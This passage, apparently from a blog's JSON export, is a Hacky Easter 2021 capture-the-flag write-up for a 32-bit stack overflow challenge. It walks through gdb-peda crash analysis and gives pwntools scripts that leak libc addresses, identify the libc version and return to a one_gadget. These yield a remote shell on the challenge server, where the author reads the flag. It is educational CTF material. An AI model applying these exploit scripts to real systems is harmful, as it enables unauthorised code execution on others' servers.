.\/doldrums<\/span>\r\nReading symbols from .\/doldrums...\r\n(No debugging symbols found in .\/doldrums)\r\ngdb-peda$ <span class=\"hl2\">pattern_create 200 \/tmp\/pattern<\/span>\r\nWriting pattern of 200 chars to filename \"\/tmp\/pattern\"\r\ngdb-peda$ <span class=\"hl2\">r < \/tmp\/pattern<\/span>\r\nStarting program: \/home\/kali\/ctf\/he21\/36\/doldrums &lt; \/tmp\/pattern\r\nWelcome! Here is a nice rime of the poet Samuel Taylor Coleridge for you!\r\nPlease press a key to continue!\r\n\r\n[Attaching after process 45833 vfork to child process 45837]\r\n[New inferior 2 (process 45837)]\r\n[Detaching vfork parent process 45833 after child exit]\r\n-------------------------------------------------------\r\nHear the rime of the ancient mariner\r\nSee his eye as he stops one of three\r\nMemmerizes one of the wedding guests\r\nStay here and listen to the nightmates of the sea\r\n\r\n...\r\n\r\nMore info? 
https:\/\/en.wikipedia.org\/wiki\/The_Rime_of_the_Ancient_Mariner\r\n\r\n[Inferior 1 (process 45833) detached]\r\n[Inferior 2 (process 45837) exited with code 0177]\r\nWarning: not running\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nOuh? We did not crash the program? The program forked due to the call to <span class=\"hl\">system<\/span>. By default <span class=\"hl\">gdb<\/span> follows the <span class=\"hl\">child<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\ngdb-peda$ <span class=\"hl2\">show follow-fork-mode <\/span>\r\nDebugger response to a program call of fork or vfork is \"<span class=\"hl2\">child<\/span>\".\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWe adjust the behavior by setting <span class=\"hl\">follow-fork-mode<\/span> to <span class=\"hl\">parent<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\ngdb-peda$ <span class=\"hl2\">set follow-fork-mode parent<\/span>\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we can input the pattern again:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\ngdb-peda$ <span class=\"hl2\">r < \/tmp\/pattern<\/span>\r\nStarting program: \/home\/kali\/ctf\/he21\/36\/doldrums &lt; \/tmp\/pattern\r\nWelcome! 
Here is a nice rime of the poet Samuel Taylor Coleridge for you!\r\nPlease press a key to continue!\r\n\r\n[Detaching after vfork from child process 46194]\r\n-------------------------------------------------------\r\nHear the rime of the ancient mariner\r\n...\r\nProgram received signal <span class=\"hl2\">SIGSEGV, Segmentation fault<\/span>.\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x0 \r\nEBX: 0x41417341 ('AsAA')\r\nECX: 0x51c \r\nEDX: 0xffffffff \r\nESI: 0xf7fb0000 --&gt; 0x1e4d6c \r\nEDI: 0xf7fb0000 --&gt; 0x1e4d6c \r\nEBP: 0x24414142 ('BAA$')\r\nESP: 0xffffd190 (\"ACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AA...\")\r\n<span class=\"hl2\">EIP: 0x416e4141 ('AAnA')<\/span>\r\nEFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n<span class=\"hl2\">Invalid $PC address: 0x416e4141<\/span>\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xffffd190 (\"ACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3A...\")\r\n0004| 0xffffd194 (\"-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAA...\")\r\n0008| 0xffffd198 (\"AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4...\")\r\n0012| 0xffffd19c (\"A;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJA...\")\r\n0016| 0xffffd1a0 (\")AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA...\")\r\n0020| 0xffffd1a4 (\"AAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAK...\")\r\n0024| 0xffffd1a8 (\"A0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgA...\")\r\n0028| 0xffffd1ac (\"FAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA...\")\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\nStopped reason: SIGSEGV\r\n0x416e4141 in ?? 
()\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThis time we kept following the parent and can observe the crash. The instruction pointer was overwritten by the pattern. Let&#8217;s determine the offset:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\ngdb-peda$ <span class=\"hl2\">pattern_offset 0x416e4141<\/span>\r\n1097744705 found at offset: <span class=\"hl2\">13<\/span>\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nAccordingly the offset from the beginning of our input to the return address is <span class=\"hl\">13<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nThe strategy for a straightforward exploitation consists of two steps. At first we leak a few function addresses in order to determine the libc version running on the target server. In the second step (the actual exploit) we leak one function address again (e.g. that of <span class=\"hl\">puts<\/span>), calculate the libc base address (we know the offset of <span class=\"hl\">puts<\/span>, since we know the libc version) and jump back to the <span class=\"hl\">main<\/span> function in order to exploit the vulnerability a second time. This time we overwrite the return address with a <span class=\"hl\">one_gadget<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nAt first let&#8217;s leak the address of <span class=\"hl\">puts<\/span>. In order to do this we overwrite the return address with the <span class=\"hl\">PLT<\/span> entry of <span class=\"hl\">puts<\/span> and provide the <span class=\"hl\">GOT<\/span> entry of it as the first argument. 
This will effectively call <span class=\"hl\">puts(&#038;puts_got)<\/span> printing the contents of the <span class=\"hl\">GOT<\/span> entry.\r\n<\/p>\r\n\r\n<p>\r\nBoth required addresses can be determined using <span class=\"hl\">gdb<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\ngdb-peda$ p 'puts@plt'\r\n$1 = {&lt;text variable, no debug info&gt;} 0x8048480 &lt;puts@plt&gt;\r\ngdb-peda$ p &'puts@got.plt'\r\n$5 = (&lt;text from jump slot in .got.plt, no debug info&gt; *) 0x804a020 &lt;puts@got.plt&gt;\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe script looks like this:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom pwn import *\r\n\r\n# distance from the start of our input to the saved return address\r\noffset = 13\r\n\r\nputs_plt = 0x08048480\r\n\r\nputs_got = 0x804a020\r\n\r\nio = remote('46.101.107.117', 2113)\r\n\r\nexpl = b'A'*offset\r\nexpl += p32(puts_plt)   # return into puts@plt\r\nexpl += b'JUNK'         # return address for puts itself (not needed here)\r\nexpl += p32(puts_got)   # first argument: the GOT slot of puts\r\n\r\nio.sendline(expl)\r\nio.recvuntil('Mariner\\n\\n')\r\nr = io.recv(4)          # the 4-byte pointer printed by puts\r\nio.close()\r\n\r\nleak = int.from_bytes(r, 'little')\r\nlog.info('leak: ' + hex(leak))\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script outputs the absolute address of <span class=\"hl\">puts<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ .\/leak.py\r\n[+] Opening connection to 46.101.107.117 on port 2113: Done\r\n[*] Closed connection to 46.101.107.117 port 2113\r\n[*] <span class=\"hl2\">leak: 0xf7dbf460<\/span>\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIn order to further narrow down the possible libc version, we use a second function (<span class=\"hl\">gets<\/span>):\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n...\r\n<span class=\"hl2\">gets_got = 0x804a010<\/span>\r\n\r\n...\r\n\r\nexpl = b'A'*offset\r\nexpl += p32(puts_plt)\r\nexpl += b'JUNK'\r\nexpl += p32(<span class=\"hl2\">gets_got<\/span>)\r\n...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the adjusted script outputs the absolute address of <span 
class=\"hl\">gets<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ .\/leak.py \r\n[+] Opening connection to 46.101.107.117 on port 2113: Done\r\n[*] Closed connection to 46.101.107.117 port 2113\r\n[*] <span class=\"hl2\">leak: 0xf7d84be0<\/span>\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWith those two addresses we can use a <a href=\"https:\/\/libc.blukat.me\/\" rel=\"noopener noreferrer\" target=\"_blank\">libc database search<\/a>, in order to determine the libc version running on the server:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_36_03.png\" alt=\"Libc\"\/>\r\n<\/p>\r\n\r\n<p>\r\nAccordingly the server is using <span class=\"hl\">libc6-i386_2.27-3ubuntu1.4_amd64<\/span>. \r\n<\/p>\r\n\r\n<p>\r\nHow does this work? The leaked addresses are influenced by <span class=\"hl\">ASLR<\/span>. This also means that they change every time we run the leak script. Though <span class=\"hl\">ASLR<\/span> does not influence the whole address but only <span class=\"hl\">12<\/span> bits of it (assuming 32-bit). 
We can see this by running <span class=\"hl\">ldd<\/span> a few times:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ ldd doldrums|grep libc\r\n        libc.so.6 =&gt; \/lib\/i386-linux-gnu\/libc.so.6 (0xf7<span class=\"hl2\">d55<\/span>000)\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ ldd doldrums|grep libc\r\n        libc.so.6 =&gt; \/lib\/i386-linux-gnu\/libc.so.6 (0xf7<span class=\"hl2\">d65<\/span>000)\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ ldd doldrums|grep libc\r\n        libc.so.6 =&gt; \/lib\/i386-linux-gnu\/libc.so.6 (0xf7<span class=\"hl2\">cf7<\/span>000)\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ ldd doldrums|grep libc\r\n        libc.so.6 =&gt; \/lib\/i386-linux-gnu\/libc.so.6 (0xf7<span class=\"hl2\">cd5<\/span>000)\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe least significant 12 bits of a function's absolute address therefore always stay the same, regardless of ASLR. These 12 bits do, however, differ between libc builds, so they can be used to narrow down the possible version. 
That is what the libc database search does.\r\n<\/p>\r\n\r\n<p>\r\nWe can directly download the identified libc from the page:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ <span class=\"hl2\">wget https:\/\/libc.blukat.me\/d\/libc6-i386_2.27-3ubuntu1.4_amd64.so<\/span>\r\n...\r\nLength: 1926828 (1.8M) [application\/octet-stream]\r\nSaving to: \u2018libc6-i386_2.27-3ubuntu1.4_amd64.so\u2019\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWith the libc at hand we can identify all <a href=\"https:\/\/github.com\/david942j\/one_gadget\" rel=\"noopener noreferrer\" target=\"_blank\">one_gadgets<\/a> within it:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ <span class=\"hl2\">one_gadget libc6-i386_2.27-3ubuntu1.4_amd64.so<\/span>\r\n0x3ccea execve(\"\/bin\/sh\", esp+0x34, environ)\r\nconstraints:\r\n  esi is the GOT address of libc\r\n  [esp+0x34] == NULL\r\n\r\n0x3ccec execve(\"\/bin\/sh\", esp+0x38, environ)\r\nconstraints:\r\n  esi is the GOT address of libc\r\n  [esp+0x38] == NULL\r\n\r\n0x3ccf0 execve(\"\/bin\/sh\", esp+0x3c, environ)\r\nconstraints:\r\n  esi is the GOT address of libc\r\n  [esp+0x3c] == NULL\r\n\r\n0x3ccf7 execve(\"\/bin\/sh\", esp+0x40, environ)\r\nconstraints:\r\n  esi is the GOT address of libc\r\n  [esp+0x40] == NULL\r\n\r\n0x6739f execl(\"\/bin\/sh\", eax)\r\nconstraints:\r\n  esi is the GOT address of libc\r\n  eax == NULL\r\n\r\n0x673a0 execl(\"\/bin\/sh\", [esp])\r\nconstraints:\r\n  esi is the GOT address of libc\r\n  [esp] == NULL\r\n\r\n0x13563e execl(\"\/bin\/sh\", eax)\r\nconstraints:\r\n  ebx is the GOT address of libc\r\n  eax == NULL\r\n\r\n0x13563f execl(\"\/bin\/sh\", [esp])\r\nconstraints:\r\n  ebx is the GOT address of libc\r\n  [esp] == NULL\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we can proceed to the actual exploitation. 
The exploit consists of two steps.\r\n<\/p>\r\n\r\n<p>\r\nFirst, the address of <span class=\"hl\">puts<\/span> is leaked again, but this time in order to calculate the libc base address (which is randomized by <span class=\"hl\">ASLR<\/span>). As the return address of the call to <span class=\"hl\">puts<\/span> we set the address of <span class=\"hl\">main<\/span>, so that execution starts over from the beginning after the leak. This allows us to exploit the vulnerability a second time (just opening a second connection does not work, since the leaked address is not valid anymore).\r\n<\/p>\r\n\r\n<p>\r\nIn the second step we use the determined libc base address to calculate the absolute address of a <span class=\"hl\">one_gadget<\/span> and use this address to overwrite the return address on the stack.\r\n<\/p>\r\n\r\n<p>\r\nHere is the script:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom pwn import *\r\n\r\noffset = 13\r\n\r\nputs_plt = 0x08048480\r\nputs_got = 0x804a020\r\nputs_offset = 0x67460\r\nmain = 0x80485e6\r\n\r\nio = remote('46.101.107.117', 2113)\r\n\r\n# 1.) leak libc base address\r\n\r\nexpl = b'A'*offset\r\nexpl += p32(puts_plt)\r\nexpl += p32(main)\r\nexpl += p32(puts_got)\r\nio.sendline(expl)\r\nio.recvuntil('Mariner\\n\\n')\r\nr = io.recv(4)\r\nputs_addr = int.from_bytes(r, 'little')\r\nlog.info('puts_addr: ' + hex(puts_addr))\r\nlibc_base = puts_addr - puts_offset\r\nlog.info('libc_base: ' + hex(libc_base))\r\n\r\n# 2.) 
overwrite return address with one_gadget\r\n\r\nog = 0x3ccea\r\nexpl = b'A'*offset\r\nexpl += p32(libc_base+og)\r\nio.sendline(expl)\r\n\r\nio.interactive()\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script yields a shell on the server:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ .\/final.py\r\n[+] Opening connection to 46.101.107.117 on port 2113: Done\r\n[*] puts_addr: 0xf7d8e460\r\n[*] libc_base: 0xf7d27000\r\n[*] Switching to interactive mode\r\n\\x10\\xd6\\xf70\\xfe\\xd3\\xf7\\xc0\\xeb\\xd8\\xf7\r\nWelcome! Here is a nice rime of the poet Samuel Taylor Coleridge for you!\r\nPlease press a key to continue!\r\n\r\n\u2501\u250f\u251b\u2503 \u2503\u250f\u2501\u251b  \u250f\u2501\u2503\u251b\u250f\u250f \u250f\u2501\u251b  \u250f\u2501\u2503\u250f\u2501\u251b  \u2501\u250f\u251b\u2503 \u2503\u250f\u2501\u251b  \u250f\u2501\u2503\u250f\u2501 \u250f\u2501\u251b\u251b\u250f\u2501\u251b\u250f\u2501 \u2501\u250f\u251b  \u250f\u250f \u250f\u2501\u2503\u250f\u2501\u2503\u251b\u250f\u2501 \u250f\u2501\u251b\u250f\u2501\u2503\r\n \u2503 \u250f\u2501\u2503\u250f\u2501\u251b  \u250f\u250f\u251b\u2503\u2503\u2503\u2503\u250f\u2501\u251b  \u2503 \u2503\u250f\u2501\u251b   \u2503 \u250f\u2501\u2503\u250f\u2501\u251b  \u250f\u2501\u2503\u2503 \u2503\u2503  \u2503\u250f\u2501\u251b\u2503 \u2503 \u2503   \u2503\u2503\u2503\u250f\u2501\u2503\u250f\u250f\u251b\u2503\u2503 \u2503\u250f\u2501\u251b\u250f\u250f\u251b\r\n \u251b \u251b \u251b\u2501\u2501\u251b  \u251b \u251b\u251b\u251b\u251b\u251b\u2501\u2501\u251b  \u2501\u2501\u251b\u251b     \u251b \u251b \u251b\u2501\u2501\u251b  \u251b \u251b\u251b \u251b\u2501\u2501\u251b\u251b\u2501\u2501\u251b\u251b \u251b \u251b   \u251b\u251b\u251b\u251b \u251b\u251b \u251b\u251b\u251b \u251b\u2501\u2501\u251b\u251b \u251b\r\n-------------------------------------------------------\r\n...\r\n\r\n$ id\r\nuid=1000(ctf) gid=1000(ctf) groups=1000(ctf)\r\n$ ls -al\r\ntotal 
56\r\ndrwxr-xr-x 1 root root  4096 Mar  3 12:11 .\r\ndrwxr-xr-x 1 root root  4096 Mar  3 08:34 ..\r\n-rw-r--r-- 1 root root   220 Apr  4  2018 .bash_logout\r\n-rw-r--r-- 1 root root  3771 Apr  4  2018 .bashrc\r\n-rw-r--r-- 1 root root   807 Apr  4  2018 .profile\r\n-rwxrwxr-x 1 root root  7048 Mar  3 12:10 challenge3\r\n-rwxrwxr-x 1 root root    25 Mar  3 12:10 flag\r\n-rw-rw-r-- 1 root root   607 Mar  3 12:10 heading\r\n-rwxrwxr-x 1 root root 18744 Mar  3 12:10 ynetd\r\n$ cat flag\r\nhe2021{1nsp3ktorr_g4dg3t}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{1nsp3ktorr_g4dg3t}<\/span>.\r\n\r\n<\/p>\r\n","protected":false},"excerpt":{"rendered":"<p>HackyEaster was awesome again. From a technical point of view there weren&#8217;t too much new things, but the creativity of the provided challenges made it really fun. Including the little teaser challenge there were a total amount of 37 challenges. These challenges were divided into different levels. You could only proceed to the next level, &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/devel0pment.de\/?p=2282\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;Hacky Easter 2021 
writeup&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[25,7],"tags":[8,9,23,13,44,18,16,21,10,38,11,12,28,19,14],"class_list":["post-2282","post","type-post","status-publish","format-standard","hentry","category-hacking-lab-com","category-writeup","tag-assembly","tag-binary","tag-crypto","tag-elf","tag-exploitation","tag-gdb","tag-hacking-lab","tag-hackyeaster","tag-pwn","tag-python","tag-r2","tag-reversing","tag-web","tag-x64","tag-x86"],"_links":{"self":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/2282"}],"collection":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2282"}],"version-history":[{"count":27,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/2282\/revisions"}],"predecessor-version":[{"id":2419,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/2282\/revisions\/2419"}],"wp:attachment":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2282"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2282"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2282"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}